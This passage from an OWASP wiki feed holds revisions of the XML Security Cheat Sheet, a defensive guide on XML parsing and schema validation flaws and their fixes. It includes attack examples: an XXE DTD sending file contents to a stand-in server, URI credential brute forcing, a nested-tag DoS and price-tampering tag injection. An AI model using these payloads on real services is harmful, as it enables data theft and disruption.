 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM ''''http://example.com/?%file;''''''&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to a valid port will be very quick (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
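&lt;br /&gt;
The averaging step can be sketched in Python as follows. The timing values are invented for illustration, the function name &amp;lt;tt&amp;gt;split_by_response_time&amp;lt;/tt&amp;gt; is hypothetical, and whether the fast or the slow group corresponds to open ports depends on the implementation being tested:&lt;br /&gt;

```python
from statistics import mean


def split_by_response_time(samples):
    """Split ports into a fast and a slow group using their mean times.

    samples maps a port number to a list of measured response times in
    seconds and must contain at least two ports.
    """
    ordered = sorted((mean(times), port) for port, times in samples.items())
    # Cut the ordered list at the widest gap between neighbouring means.
    cut = max(range(1, len(ordered)),
              key=lambda i: ordered[i][0] - ordered[i - 1][0])
    fast = [port for _, port in ordered[:cut]]
    slow = [port for _, port in ordered[cut:]]
    return fast, slow


# Hypothetical measurements, three per port.
timings = {
    22: [0.021, 0.019, 0.020],
    80: [0.018, 0.022, 0.020],
    8080: [0.051, 0.049, 0.050],
}
print(split_by_response_time(timings))
```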
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the user information part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
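&lt;br /&gt;
To see which parts of such a URI carry the credentials, the example can be split with Python's standard &amp;lt;tt&amp;gt;urllib.parse&amp;lt;/tt&amp;gt; module. This is only an illustration of the URI layout, not of any particular XML parser's behavior:&lt;br /&gt;

```python
from urllib.parse import urlsplit

parts = urlsplit("foo://username:password@example.com:8080/")

print(parts.scheme)    # foo
print(parts.username)  # username
print(parts.password)  # password
print(parts.hostname)  # example.com
print(parts.port)      # 8080
```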
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224440</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224440"/>
				<updated>2016-12-21T20:27:20Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken by a regular XML document with the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
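&lt;br /&gt;
The integrity check mentioned above could be as simple as comparing the schema file against a digest recorded when the schema was reviewed. The following Python sketch assumes a SHA-256 digest stored as a hexadecimal string; the function name &amp;lt;tt&amp;gt;schema_matches_digest&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
import hashlib
import hmac


def schema_matches_digest(schema_bytes, expected_sha256_hex):
    """Return True when the schema content has the expected SHA-256 digest."""
    actual = hashlib.sha256(schema_bytes).hexdigest()
    # compare_digest avoids leaking how many leading characters matched.
    return hmac.compare_digest(actual, expected_sha256_hex.lower())
```

A schema whose digest does not match should be rejected before any document is validated against it.&lt;br /&gt;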
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
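&lt;br /&gt;
The effect of reading only the first matching element can be reproduced with Python's standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; module. In this sketch the tampered message is built element by element rather than parsed, and the structural check &amp;lt;tt&amp;gt;has_expected_structure&amp;lt;/tt&amp;gt; is a hypothetical stand-in for schema validation:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

# Build the tampered message from the example above element by element.
buy = ET.Element("buy")
ET.SubElement(buy, "id").text = "123"
ET.SubElement(buy, "price").text = "0"   # injected by the attacker
ET.SubElement(buy, "id")                 # empty element that restores well-formedness
ET.SubElement(buy, "price").text = "10"  # price set by the application

# A lookup that returns the first match picks up the attacker's price.
print(buy.findtext("price"))  # 0


def has_expected_structure(element):
    """Accept only a buy element with exactly one id followed by one price."""
    return element.tag == "buy" and [child.tag for child in element] == ["id", "price"]


print(has_expected_structure(buy))  # False
```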
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;, as is the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
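&lt;br /&gt;
When the schema language cannot express such limits, the application has to enforce them itself. The Python sketch below shows one way to do so; the policy of one to three digits and the name &amp;lt;tt&amp;gt;is_valid_age&amp;lt;/tt&amp;gt; are assumptions made for illustration:&lt;br /&gt;

```python
import re

# Hypothetical policy: an age is one to three decimal digits.
AGE_PATTERN = re.compile(r"[0-9]{1,3}")


def is_valid_age(text):
    """Return True when text contains only one to three ASCII digits."""
    return AGE_PATTERN.fullmatch(text) is not None


print(is_valid_age("42"))           # True
print(is_valid_age("1" * 1000000))  # False
```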
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
   &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
 &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions were only partially set for the element, which means that the information was probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
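&lt;br /&gt;
The difference between a strict and a partial check can be illustrated with Python's standard &amp;lt;tt&amp;gt;base64&amp;lt;/tt&amp;gt; module, whose decoder only rejects characters outside the base64 alphabet when &amp;lt;tt&amp;gt;validate=True&amp;lt;/tt&amp;gt; is passed. The sketch below is unrelated to the appliance mentioned above, and the function name &amp;lt;tt&amp;gt;is_strict_base64&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
import base64
import binascii


def is_strict_base64(text):
    """Return True only when every character of text belongs to valid base64."""
    try:
        base64.b64decode(text, validate=True)
    except binascii.Error:
        return False
    return True


print(is_strict_base64("QUJD"))            # True
print(is_strict_base64("QUJD!!trailing"))  # False
```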
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type rejects unexpected characters. Once the application receives the previous message, it may calculate the final price as &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, the &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt; data type also allows negative values, so an attacker who provides a negative quantity could cause a negative result on the user’s account. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;. &lt;br /&gt;
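&lt;br /&gt;
The schema restriction can be backed by an equivalent check in application code. The following Python sketch is a minimal illustration under stated assumptions: the function name &amp;lt;tt&amp;gt;order_total&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;ORDER&amp;lt;/tt&amp;gt; template are hypothetical, and only the standard library is used:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET
from decimal import Decimal

# Hypothetical message template mirroring the sample <buy> document.
ORDER = "<buy><id>1</id><price>10</price><quantity>{}</quantity></buy>"


def order_total(xml_text):
    """Return price * quantity, refusing quantities below 1."""
    buy = ET.fromstring(xml_text)
    price = Decimal(buy.findtext("price"))
    quantity = int(buy.findtext("quantity"))
    # Mirror xs:positiveInteger: zero and negative quantities are refused.
    if quantity < 1:
        raise ValueError("quantity must be a positive integer")
    return price * quantity
```

With this check in place, a quantity of -5 raises an error instead of producing a total of -50.&lt;br /&gt;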
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If the schema uses a data type that still admits zero (such as &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;nonNegativeInteger&amp;lt;/tt&amp;gt;), a zero denominator may still trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: negative infinity (&amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;), not a number (&amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;), and positive infinity (&amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;). These special values may be useful in some contexts, but the types are often misused: they are commonly chosen for elements that should only ever hold real numbers, such as prices. This is a common error in programming languages in general, not one restricted to XML technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
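With the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type, a price of Infinity or NaN fails validation and never reaches the application, so it cannot trigger errors there. If those values were allowed (for example, by using &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt;), an attacker could exploit them.&lt;br /&gt;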
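&lt;br /&gt;
Application code that parses such values as floating point numbers can be affected in subtle ways. The following Python sketch (the function names and the upper bound of 10000 are assumptions made for illustration) shows how NaN slips through a naive range check, because every comparison against NaN is false, and how a decimal-based parser can refuse the special values:&lt;br /&gt;

```python
from decimal import Decimal, InvalidOperation


def naive_price_ok(text):
    """Range check on a float: NaN passes because all comparisons are False."""
    price = float(text)
    return not (price < 0 or price > 10000)


def strict_price(text):
    """Parse a finite decimal, similar in spirit to xs:decimal (not identical)."""
    try:
        price = Decimal(text)
    except InvalidOperation:
        raise ValueError("not a decimal number") from None
    # Decimal itself accepts NaN and Infinity, so they are refused explicitly.
    if not price.is_finite():
        raise ValueError("special values are not allowed")
    return price
```

Here &amp;lt;tt&amp;gt;naive_price_ok(&amp;quot;NaN&amp;quot;)&amp;lt;/tt&amp;gt; returns true, while &amp;lt;tt&amp;gt;strict_price(&amp;quot;NaN&amp;quot;)&amp;lt;/tt&amp;gt; raises an error.&lt;br /&gt;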
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. A schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
